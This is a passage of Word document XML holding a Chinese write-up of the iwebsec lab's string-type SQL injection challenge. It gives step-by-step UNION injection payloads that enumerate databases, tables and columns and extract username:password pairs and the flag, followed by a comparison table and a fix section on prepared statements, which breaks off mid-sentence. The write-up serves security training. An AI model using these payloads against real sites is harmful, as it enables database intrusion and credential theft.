          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>恒假测试</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>（验证注入可控）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2A166F8B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?id=1' and '1'='2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441D70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拼接后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SELECT * FROM news WHERE id = '1' and '1'='2' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA28E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预期结果：页面无数据返回、空白或报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9DF2F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>and '1'='2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为永假条件，整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>子句为假，无匹配记录，证明可完全控制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查询逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CAB98" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. order by 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>列数猜解（与数字型一致）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="7A1F2C51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?id=1' order by 4 -- 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 xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用于注释后面的单引号，避免语法错误）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0849B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预期结果：页面报错，确定查询结果共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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0340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原理：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-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注释符，注释掉后端多余的单引号，避免语法错误；</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列数猜解逻辑</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与数字型完全一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A7866" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>第二步：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注入完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>（与数字型对应，适配字符型闭合）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="695F103B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核心逻辑：用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=-1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>闭合前置单引号并让原查询无结果，拼接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-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注释后置单引号，确保语法合法；严格按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列结构编写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B24EB" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22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获取当前数据库名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0F24A97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?id=-1'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2,database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 xml:space="preserve">() -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D809D72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预期结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当前数据库名（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43791905" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取所有数据库名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="616B6DD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?id=-1'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schema_name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) fr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information_schema.schemata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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4D2DF" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取当前库（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>）所有表名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="6B534777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?id=-1'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)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information_schema.tables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where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table_schema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='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' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938D471" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表所有列名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="20D83703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?id=-1'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column_name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) fro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information_schema.columns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where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table_schema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='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' and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table_name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='users' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AD3D5" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表账号密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0ABFD573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?id=-1'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2,group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>_concat(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username,':',password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separator '&lt;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br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&gt;')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iwebsec.users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-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E5F32" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取靶场通关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="58CCCC1B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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' union select 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>,flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t xml:space="preserve"> from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iwebsec.flag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 xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA6DD0" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>四、核心对比与原理总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="15F24653" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>数字型与字符型注入核心区别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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760"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D0D0E" w14:paraId="0774A47B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CBE0E5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对比项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15103D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数字型注入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A4A08D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字符型注入（单引号）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="3DE33B10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5218D7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后端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>格式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C5D291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id = $id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ADE08E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id = '$id'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="01E33FFC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BF9D0A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注入</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>点判断</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>关键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6DC578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输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>报错，无需闭合引号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2AF331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输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>报错，需用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>闭合前置引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="26824775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2B1FF5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UNION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注入关键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CB1A1F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id=-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，无需注释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9703B4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id=-1' + -- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释后置引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="10CD58BF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FFAA36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核心风险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0D9088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直接拼接数字，无过滤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4E907B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单引号闭合后拼接逻辑，无过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69B0F15B" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>通用原理总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2E4FC22B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注入本质：用户输入未做过滤，直接拼接进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语句，导致攻击者可篡改查询逻辑，获取敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC81ED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核心前提：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注入必须保证前后查询列数一致、数据类型兼容；列数通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D838C6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关键函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（当前库）、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（合并结果）、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（系统表，存储元数据）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F73DF" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>五、漏洞修复方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="51029669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核心修复：使用预编译语句（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prepared Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），将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语法与用户输入分离，彻底杜绝注入（示例见下方）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5DAC5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辅助防护：对输入参数进行严格校验（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数字型仅允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，字符型过滤特殊符号）；最小化数据库用户权限；部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
